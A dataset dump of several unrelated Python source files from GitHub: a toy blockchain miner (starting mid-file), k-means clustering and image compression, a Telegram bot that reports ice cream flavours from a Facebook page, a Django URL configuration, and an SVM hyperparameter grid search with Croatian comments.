\"6e31633822177790dd38702db12495af223e72b684ab5950bc4cde10\"]\n blockchain = [genesisBlock]\n globalBlockchain = blockchain\n while True:\n print(\"blockchain: \" + str(globalBlockchain)+\"\\n\")\n nonce = 0\n foundHash = 0\n transaction = {\n \"startUser\": \"server\",\n \"endUser\": user_id,\n \"amount\": \"10\"\n }\n prevBlock = blockchain[-1]\n prevHash = prevBlock[-1]\n while foundHash == 0:\n nonce += 1\n block = []\n block.append(nonce)\n block.append(prevHash)\n block.append(transaction)\n s.update(bytes(str(block), \"utf-8\"))\n hash = s.hexdigest()\n if(hash[:5] == \"00000\"):\n block.append(hash)\n foundHash = 1\n blockchain.append(block)\n globalBlockchain = blockchain\n #TODO: add p2p connection\n\nt1 = threading.Thread(target=blockchainMinerLoop)\n\ndef p2pStart():\n global otherIps\n global p2pnode\n def node_callback(event, node, connected_node, data):\n try:\n if event != 'node_request_to_stop': # node_request_to_stop does not have any connected_node, while it is the main_node that is stopping!\n print('Event: {} from main node {}: connected node {}: {}'.format(event, node.id, connected_node.id, data))\n\n except Exception as e:\n print(e)\n\n # The main node that is able to make connections to other nodes\n # and accept connections from other nodes on port 8001.\n p2pnode = node.Node(\"0.0.0.0\", 80, node_callback)\n\n # Do not forget to start it, it spins off a new thread!\n p2pnode.start()\n time.sleep(1)\n\n while True:\n for x in range(0, len(otherIps)):\n p2pnode.connect_with_node(otherIps[x], 80)\n p2pnode.send_to_nodes('{\"message\": \"OLPing\"}')\n time.sleep(0.05) # connection throttling sucks ass\n\n\n # Gracefully stop the node.\n p2pnode.stop()\n\nt3 = threading.Thread(target=p2pStart)\n\n#start flask\n#t2.start()\n#print(\"Flask/Browser View thread started.\")\nt3.start()\n\ntime.sleep(1)\ndef getOptions(): \n global options\n global t1\n global t3\n global otherIps\n options = input(\"Would you like to CONFIGURE NODEWEB (1), SEND QTM (2), or MINE QTM (3)?\\n\\n\")\n\n try:\n options = int(options)\n except:\n print(\"try again, that isn't a number\")\n getOptions()\n if(options == 1):\n print(\"IP List: \" + str(otherIps))\n addip = input(\"What other IP should we add to your node?\\n\")\n otherIps.append(socket.gethostbyname(addip))\n getOptions()\n if(options == 3):\n t1.start()\n\ngetOptions()\n","repo_name":"hotcocoaNcode/Quantonium","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31387845367","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nfrom PIL import Image\nnp.set_printoptions(threshold=np.nan)\nimport matplotlib.pyplot as plt\n\n\n\n# In[9]:\n\n\nimage = Image.open('Images/Image1.png')\nX = np.array(image)\nX = X/255\nimgplot = plt.imshow(X)\nplt.show()\nX = X.reshape(X.shape[0]*X.shape[1],4)\nX = X.transpose()\nlabels = np.zeros((1,X.shape[1]))\nX = np.append(X,labels,axis = 0)\n\n\n# # <center>Visualizing data</center>\n\n# In[3]:\n\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure()\n\nax = fig.add_subplot(111, projection='3d')\n\nxs = np.real(X[0,0:50000])\nys = np.real(X[1,0:50000])\nzs = np.real(X[2,0:50000])\nxt = np.real(X[0,250000:300000])\nyt = np.real(X[1,250000:300000])\nzt = np.real(X[2,250000:300000])\n\nax.scatter(xs, ys,zs , c='c', marker='o')\nax.scatter(xt, yt,zt , c='m', marker='o')\n\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\n\nplt.show()\n\n\n# # <center>Compute initial centroids</center>\n\n# In[4]:\n\n\ndef init_centroids(a,k):\n centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n num = np.random.randint(0,np.shape(a)[1])\n centroids[:,i] = a[:,num]\n centroids[4,i] = i\n a[4,num] = i\n return centroids\n\n\n# # <center>Computer new centroids</center>\n\n# In[5]:\n\n\ndef new_centroids(a,k):\n new_centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n new_centroids[:,i] = np.mean(a[:,a[4,:]==i],axis = 1)\n print(np.shape(new_centroids))\n return new_centroids\n\n\n# # <center>Compute distance to centroids & assign labels</center>\n\n# In[6]:\n\n\nfrom scipy.spatial.distance import cdist as cd\n\ndef distance(a,centroids):\n index2 = np.shape(centroids)[1]\n temp = np.zeros((1,index2))\n print(np.shape(a))\n for i in range(0,np.shape(a)[1]):\n temp = cd([a[0:4,i].transpose()],centroids[0:4,:].transpose(),metric = 'euclidean')\n closest_centroid = np.argmin(temp)\n temp2 = centroids[:,closest_centroid]\n a[:,i] = temp2\n return a\n\n\n# In[7]:\n\n\nnum_centroids = 24\nX_temp = np.zeros((5,409960))\ncentroids = init_centroids(X,num_centroids)\nX_temp = distance(X,centroids)\nfor i in range(0,1):\n centroids_new = new_centroids(X_temp,num_centroids)\n centroids = centroids_new\n X_temp = distance(X_temp,centroids)\n \n\n\n# In[8]:\n\n\nimport scipy.misc\n\nr = X_temp[0,:]\ng = X_temp[1,:]\nb = X_temp[2,:]\nr = r.reshape(740,554)\ng = g.reshape(740,554)\nb = b.reshape(740,554)\nrgb = np.dstack((r*255,g*255,b*255))\n\nscipy.misc.imsave('rgb.jpg',rgb)\nimage = Image.open('rgb.jpg')\nimgplot = plt.imshow(image)\nplt.show()\n\n","repo_name":"shubham2604/MachineLearning","sub_path":"Python_codes/Image_compression_using_k_means.py","file_name":"Image_compression_using_k_means.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"93316100","text":"import Statics\nimport random as ran\n\nclass kmeans():\n def __init__(self, initializationMethod):\n self.initializationMethod = initializationMethod\n\n def main(self, k):\n assignedCluster = []\n newCentroids = []\n\n # Calculate initial centroids\n if self.initializationMethod == \"plus\":\n initialCentroids = self.initializePlus(k)\n elif self.initializationMethod == \"normal\":\n initialCentroids = self.initializeClusters(k)\n elif self.initializationMethod == \"spread\":\n initialCentroids = self.initializeSpread(k)\n\n # adjust centroids by iteration, stop when finished or max iterations\n for num in range(0, Statics.maxIterations):\n #TODO: how to copy elements?\n assignedCluster [:] = [] #delete values in list\n assignedCluster [:] = self.assign_Centroid(initialCentroids, k)\n newCentroids [:] = [] #delete values in list\n newCentroids [:] = self.recalculate_Centroids(assignedCluster, k)\n # recognizing natural finish point\n if initialCentroids == newCentroids:\n break;\n\n if num==Statics.maxIterations:\n assignedCluster [:] = self.assign_Centroid(newCentroids, k)\n\n initialCentroids [:] = list(newCentroids)\n\n return newCentroids, assignedCluster\n\n\n # initializes k centroids\n # picks random data points as initial centroids\n def initializeClusters(self, k):\n centroids = [];\n for cluster in range(0, k):\n ch = ran.choice(Statics.data)\n centroids.append(ch)\n return centroids\n\n def initializePlus(self, k):\n centroids = [];\n centroids.append(ran.choice(Statics.data))\n\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n totalDistance = 0\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances [:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick the nearest cluster for the current data point\n minDistances.append([Statics.data.index(datapoint), min(distances)])\n totalDistance += min(distances)\n\n # Fill a cummulative list, 0 to 1, with appropiate probabilities, which is used to pick the new centroid by weighted probability\n cumProbabilities = []\n previousProb = 0\n for minDistance in minDistances:\n probability = (minDistance[1]/totalDistance) * 100\n if minDistance == minDistances[0]:\n cumProbabilities.append([minDistance[0], probability])\n else:\n cumProbabilities.append([minDistance[0], previousProb + probability])\n previousProb += probability\n\n r = ran.uniform(0.0, 100.0)\n for cumProbability in cumProbabilities:\n if r < cumProbability[1]:\n centroids.append(Statics.data[cumProbability[0]])\n break\n\n return centroids\n\n # Picks points as far away from each other as possible as initial clusters\n def initializeSpread(self, k):\n centroids = []\n\n # Get minimum values for all dimensions and use these as first centroid\n minimumValues = []\n for dataPoint in Statics.data:\n if dataPoint == Statics.data[0]:\n for dimension in range(0, len(dataPoint)):\n minimumValues.append(dataPoint[dimension])\n else:\n for dimension in range(0, len(dataPoint)):\n if dataPoint[dimension] < minimumValues[dimension]:\n minimumValues[dimension] = dataPoint[dimension]\n centroids.append(minimumValues)\n\n # Calculate all distances from data points to their nearest cluster\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances[:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick closest cluster for the current data point\n minDistances.append(sum(distances))\n\n # Select the data point of which its nearest cluster is the furthest away, and use this as the new centroid\n centroids.append(Statics.data[minDistances.index(max(minDistances))])\n\n return centroids\n\n def calculate_LDistance (self, currentData, currentCentroid, lNorm):\n return pow(sum([pow(abs(currentData - currentCentroid),lNorm) for currentData, currentCentroid in zip(currentData, currentCentroid)]),(1/lNorm))\n\n def calculate_ChebyshevDistance (self, currentData, currentCentroid):\n return max([abs(currentData - currentCentroid) for currentData, currentCentroid in zip(currentData, currentCentroid)])\n\n # assigns data points to the nearest centroid\n def assign_Centroid(self, centroids, k):\n distance = []\n cluster = []\n j=0\n while (j<Statics.lines):\n i=0\n currentData = Statics.data[j]\n while (i<k):\n\n currentCentroid = centroids[i]\n #calculate euclidean distance from one datapoint to all centroids\n distance.append(self.calculate_LDistance(currentData, currentCentroid, 2))\n #distance.append(calculate_ChebyshevDistance(currentData, currentCentroid))\n i = i+1\n #choose the index of the smallest difference\n cluster.append(distance.index(min(distance)))\n distance [:] = []\n j =j+1\n return cluster\n\n def recalculate_Centroids (self, assignedCluster, k):\n # calculate new Centroids, by using the mean of all data points\n localCentroids = []\n for num in range(0,k):\n #list of indices for datapoints assigned to chosen cluster\n index = [ idx for idx, val in enumerate(assignedCluster) if val == num]\n #list of datapoints, identified by using indices\n temparray = [Statics.data[i] for i in index]\n #creating the sum of each dimension of the selected DataPoints\n sumarray = [sum(i) for i in zip(*temparray)]\n #Get the number of data points of each dimension to create mean\n listLength = sum(1 for x in temparray if isinstance(x,list))\n #create mean for each dimension\n localCentroids.append([x / listLength if sum else 0 for x in sumarray])\n return localCentroids\n\n def calculateSumSquaredError (self, localCentroids, assignedCluster, lNorm):\n sumSquareDistance = 0\n counter = 0\n while (counter<Statics.lines):\n currentData= Statics.data[counter]\n currentCentroid = localCentroids[assignedCluster[counter]]\n #calculate distance from one datapoint to assigned cluster centr oid\n sumSquareDistance = sumSquareDistance + pow(self.calculate_LDistance(currentData, currentCentroid, lNorm),2)\n #sumSquareDistance = sumSquareDistance + pow(calculate_ChebyshevDistance(currentData, currentCentroid), 2)\n counter =counter+1\n return sumSquareDistance\n\n def getClusterStatistics (self, assignedClusters, k):\n stat = [0] * k\n for i in range(0, len(assignedClusters)):\n stat[assignedClusters[i]] = stat[assignedClusters[i]] +1\n return stat","repo_name":"ReneRa/K-Means-Clustering","sub_path":"k-means/src/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29259181112","text":"import configparser\nimport datetime\nimport logging\nimport os\nimport re\nfrom typing import Dict\n\nfrom facebook_scraper import get_posts\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\n\nfrom message_util import already_registered, help_message, successfully_registered, register_first, \\\n watching_no_flavors\nfrom persist_data import write_data_to_file, read_data_from_file\nfrom user import User\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\ndata: Dict[str, User] = read_data_from_file()\nconfig = configparser.ConfigParser()\nif os.path.isfile(\"/config/config\") or os.path.isfile(\"../config\"):\n config.read(\"/config/config\" if os.path.isfile(\"/config/config\") else \"../config\")\nelse:\n logging.log(logging.ERROR, \"Config is missing\")\n\ncache: Dict[str, any] = {\n \"cache_text\": None,\n \"cache_date\": None\n}\n\n\ndef start(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username in data:\n context.bot.sendMessage(text=already_registered, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n data[username] = User(username=username)\n write_data_to_file(data)\n context.bot.sendMessage(text=successfully_registered, chat_id=update.effective_user.id)\n\n\ndef configure(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/configure\", \"\").lstrip()\n if not token:\n return\n data.get(username).page_url = token\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Updated subscribed shop.\", chat_id=update.effective_user.id)\n\n\ndef add(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/add\", \"\").lstrip()\n if not token:\n return\n if token.lower() not in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.append(token.lower())\n write_data_to_file(data)\n message = str(\"Now watching out for: {}\").format(token.capitalize())\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n\n\ndef remove(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n message = update.message.text.replace(\"/remove\", \"\").lstrip()\n if not message:\n return\n if message.lower() in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.remove(message.lower())\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Removed {}\".format(message.capitalize()), chat_id=update.effective_user.id)\n\n\ndef post(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_post() is not None:\n context.bot.sendMessage(text=get_post(), chat_id=update.effective_user.id)\n\n\ndef list_flavors(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(data.get(username).ice_cream_flavors) > 0:\n message: str = \"\"\n for flavor in data.get(username).ice_cream_flavors:\n message += flavor.capitalize() + \"\\n\"\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=watching_no_flavors, chat_id=update.effective_user.id)\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n\n\ndef get_update(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_available_message(username) is not None:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=get_available_message(username))\n\n\ndef start_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) != 0:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=\"Already subscribed to notifications.\")\n return\n time = datetime.time(10, 20, 00)\n args = {\"username\": username,\n \"chat_id\": update.message.chat_id}\n context.job_queue.run_daily(\n callback=notify_job,\n time=time,\n days=tuple(range(7)),\n context=args,\n name=username)\n context.bot.sendMessage(text=\"You'll get notified at {} UTC.\".format(time.isoformat(timespec=\"minutes\")),\n chat_id=update.effective_user.id)\n\n\ndef stop_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) == 0:\n context.bot.sendMessage(text=\"You are not subscribed to notifications yet.\", chat_id=update.effective_user.id)\n return\n context.job_queue.get_jobs_by_name(username)[0].schedule_removal()\n context.bot.sendMessage(text=\"You'll not get notified any longer.\", chat_id=update.effective_user.id)\n\n\ndef notify_job(context):\n if get_available_message(context.job.context.get(\"username\")) is not None:\n context.bot.sendMessage(chat_id=context.job.context.get(\"chat_id\"),\n text=get_available_message(context.job.context.get(\"username\")))\n\n\ndef get_available_message(username: str) -> str or None:\n if username not in data:\n return None\n post = get_post()\n available_flavors: list[str] = list()\n user: User = data.get(username)\n for flavor in user.ice_cream_flavors:\n if user.page_url.casefold() == \"both\".casefold():\n if flavor.casefold() in post.casefold():\n available_flavors.append(flavor)\n elif \"Lindenhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Lindenhof((?:.|\\s)*?)Limburgerhof\", post,\n flags=re.IGNORECASE).group(1) \\\n or \"Limburgerhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Limburgerhof((?:.|\\s)*?)$\", post, flags=re.IGNORECASE).group(1):\n available_flavors.append(flavor)\n if len(available_flavors) > 0:\n return \"The following flavors are available today: {}\".format(', '.join(available_flavors))\n\n\ndef get_post() -> str:\n date_today = datetime.date.today()\n cache_date = cache[\"cache_date\"]\n cache_text = cache[\"cache_text\"]\n if cache_date is not None and cache_date == date_today:\n return cache_text.casefold()\n else:\n posts = get_posts(\"eismanufakturzeitgeist\", pages=1, cookies=config['Cookies']['path-to-cookies'])\n for post in posts:\n if post['time'].date() == date_today:\n cache[\"cache_text\"] = post['text']\n cache[\"cache_date\"] = date_today\n return cache[\"cache_text\"].casefold()\n\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(config['Telegram']['bot-token'])\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"add\", add))\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\n dispatcher.add_handler(CommandHandler(\"list\", list_flavors))\n dispatcher.add_handler(CommandHandler(\"configure\", configure))\n dispatcher.add_handler(CommandHandler(\"update\", get_update))\n dispatcher.add_handler(CommandHandler(\"post\", post))\n dispatcher.add_handler(CommandHandler(\"start_notify\", start_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"stop_notify\", stop_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"help\", help))\n\n # on non command i.e message - echo the message on Telegram\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RatzzFatzz/zeitgeist-notifier","sub_path":"src/facebook_notifier.py","file_name":"facebook_notifier.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3668436398","text":"#-*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom perso.views import create_error_view\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^namegen/', include(\"namegen.urls\")),\n url(r'^dynimg/', include(\"dynimg.urls\")),\n url(r'^playel/', include(\"playel.urls\")),\n url(r'^profs/', include(\"profs.urls\")),\n url(r'^avatar/', include(\"avatar.urls\")),\n url(r'^quotes/', include(\"quotes.urls\")),\n url(r'^register/', include(\"register.urls\")),\n url(r'^blog/', include(\"perso.urls\")),\n url(r'^', include(\"portfolio.urls\")),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\nhandler400 = create_error_view(code=400)\nhandler403 = create_error_view(code=403)\nhandler404 = create_error_view(code=404)\nhandler500 = create_error_view(code=500)\n","repo_name":"crazy-djactor/LMinaw","sub_path":"leminaw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72152699847","text":"\"\"\"\nTreći dio: Support Vector Machine\nPotrebno je provesti pretraživanje po rešetki nad hiperparametrima C i gamma kako bi se dobile optimalne vrijednosti\nza sve setove podataka. Očekuje se da će oni biti malo drugačiji za različite setove.\nC - dozvoljena pogreška klasifikacije; obrnuto proporcionalna jačina regularizacije lambda, C=1/lambda\ngamma - koef. jezgre za rbf, poly i sigmoidalnu funkciju.\nAnaliza će se provjeriti posebno za 3 jezgrene funkcije: rbf, poly i linear.\nNa kraju će se rezultati zapisati u excel datoteke posebno za svaki set podataka, u svakoj za sve 3 jezgrene funkcije.\n\n\"\"\"\n\n\nfrom Preprocessing import input_data, output_data\n# Ukoliko se žele stvarati novi podaci svaku skriptu, ovo NE treba biti zakomentirano\nfrom Preprocessing import divided_train_data, all_X_test_data\n\nimport openpyxl, pickle, os, shutil\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\n\noutput_SVM = output_data+\"C_SVM/\"\n\nwith open(input_data+'/divided_train_data.pickle', 'rb') as f_X_train:\n divided_train_data = pickle.load(f_X_train)\nwith open(input_data+'/all_X_test_data.pickle', 'rb') as f_test:\n all_X_test_data = pickle.load(f_test)\n\ntry:\n shutil.rmtree(output_SVM)\nexcept:\n FileNotFoundError\nos.mkdir(output_SVM)\n\n\n# Velika SVM funkcija koja računa točnost za rbf, poly i linear jezgrene funkcije z sve data setove\ndef grid_search(data_name, X_train, Y_train, X_valid, Y_valid):\n\n # Pomoćna funkcija koja ispisuje koliko je gotovo simulacija od ukupnog broja\n def current_sim_number(c,gamma, C_range, gamma_range):\n m = C_range.index(c)\n n = gamma_range.index(gamma) # indexi trenutnog položaja\n\n num = n * len(C_range) + m +1 # number of simulation\n percentage_over = num / (len(C_range) * len(gamma_range))\n percentage_over_str = (str(num) + \"/\" + str(len(C_range) * len(gamma_range)))\n print(percentage_over_str)\n return percentage_over\n\n\n # Postavljanje hiperparametara i excel datoteke za spremanje pretraživanja\n xlsx_name = output_SVM+\"Acc_SVM_\"+data_name+\".xlsx\" # ime excel file u koji se spremaju rezultati, kasnije\n Acc_grid_search = pd.ExcelWriter(xlsx_name) # stvaranje excela\n C_range = range(-10, -3) # rang baze za C\n gamma_range = range(-20, -5)\n C_f = lambda m: 2 ** m # Funkcije za računanje C i gamma\n gamma_f = lambda n: 2 ** n\n best_grid_acc = {\"radial_base\":[], \"poly\":[], \"linear\":[]}\n\n\n # SVM s radijalnom baznom funkcijom\n def radial_base_function():\n accuracity_matrix = {}\n max_acc = 0 # inicijalno postavljanje najbolje točnosti i array-project_data pozicija\n\n for gamma_ in gamma_range: # Pretraživanje za jedan red (C=..)\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = [] # Rezultati se spremaju u matricu\n\n for c_ in C_range: # Pretraživanje za jedan stupac (gamma=..)\n svcModel = SVC(C=C_f(c_), kernel=\"rbf\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"radial_base\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n best_grid_acc[\"radial_base\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n current_sim_number(c_, gamma_, C_range, gamma_range) # ispisuje gotove simulacije\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range] # imena indexa DataFrame-project_data, gamma=.. podaci\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n\n # Redovi su vrijednosti C, kolone vrijednosti gamma\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"radial_base\", startcol=0, startrow=0)\n\n radial_base_function()\n\n\n\n # Polinomijalna bazna funkcija\n def poly_function():\n C_range_poly = range(-15, -5)\n gamma_range_poly = range(-15, -5)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_poly:\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = []\n\n for c_ in C_range_poly:\n svcModel = SVC(C=C_f(c_), kernel=\"poly\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n current_sim_number(c_, gamma_, C_range_poly, gamma_range_poly)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"poly\"] = [[n_C, n_gamma]]\n\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n best_grid_acc[\"poly\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_poly]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"poly\", startcol=0, startrow=0)\n\n poly_function()\n\n\n\n\n def linear_function():\n gamma_range_linear = [1]\n C_range_linear = range(-15, -3)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_linear:\n accuracity_matrix[1] = []\n\n for c_ in C_range_linear:\n svcModel = SVC(C=C_f(c_), kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n accuracity_matrix[1].append([acc_train, acc_valid])\n current_sim_number(c_, gamma_, C_range_linear, gamma_range_linear)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"linear\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n best_grid_acc[\"linear\"].append([n_C, n_gamma])\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_linear]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"linear\", startcol=0, startrow=0) # Redovi su vrijednosti C, kolone vrijednosti gamma\n\n linear_function()\n\n\n Acc_grid_search.save() # Spremanje DF u excel file\n workbook=openpyxl.load_workbook(xlsx_name)\n\n # Otvara sve sheetove ovisno o rječniku gdje su spremljeni podaci\n for kernel_function in best_grid_acc.keys(): # iterira riječnik sa svim podacima točnosti\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).value = \"C/gamma\" # ispis u ćeliju\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).fill = \\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FFFF00\") # bojanje oznaka gamma, C\n\n # Iteracija po zapisanim koordinatama gdje se nalazi maksimalna točnost modela\n for position in best_grid_acc[kernel_function]:\n workbook.get_sheet_by_name(kernel_function).cell(row=2+position[0], column=2+position[1]).fill =\\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FF0000\")\n\n workbook.save(xlsx_name)\n\n\n####################################################################################################################\n\n# Iteracija po svim podacima spremljenim u pickle\nfor data_name in divided_train_data[\"X_train_data\"]:\n\n X_train = divided_train_data[\"X_train_data\"][data_name]\n Y_train = divided_train_data[\"Y_train_data\"][data_name]\n X_valid = divided_train_data[\"X_valid_data\"][data_name]\n Y_valid = divided_train_data[\"Y_valid_data\"][data_name]\n\n grid_search(data_name, X_train, Y_train, X_valid, Y_valid) # provodi cijelu analizu i izbacuje excel\n\n\n\n\n####################################################################################################################\n\n\n\n\n\n\n\"\"\"\nZaključak:\n\n - Model s početnim vrijenostima hiperparametara pokazuje najveću točnost za RBF jezgrenu funkciju. Daljnim \n podešavanjem hiperparametara moguće je postići veću točnost i za druge jezgre. Negativna stvar je da za \n veće vrijednosti hiperparametara modeli osjetno sporije konvergiraju te je potreban kompromis. \n \n\n -Nakon provedene analize zaključuje se da su veće vrijednosti hiperparametara optimalne (C=100, gamma=) te su \n također i stabilnije i ustaljene točnosti. C=1, gamma=1 su vrijednosti hiperparametara za koje model s \n osnovnim podacima ima općenito najveću točnost. \n \n -Rezultati pravilno konvergiraju rješenju kada se vrijednosti hiperparametara mijenjaju po kvadratnoj funkciji.\n \n -Modeli s drugim podacima i funkcijama imaju istu maksimalnu točnost, ALI se do nje može brže doći promjenom HP.\n -> pogotovo kod korištenja poly jezgrene funkcije\n \n -Vjerojatno se točnost kod poly modela može još malo podići uz dosta veću računalnu zahtjevnost - neisplativo\n\n\n\n\n # za čiste podatke 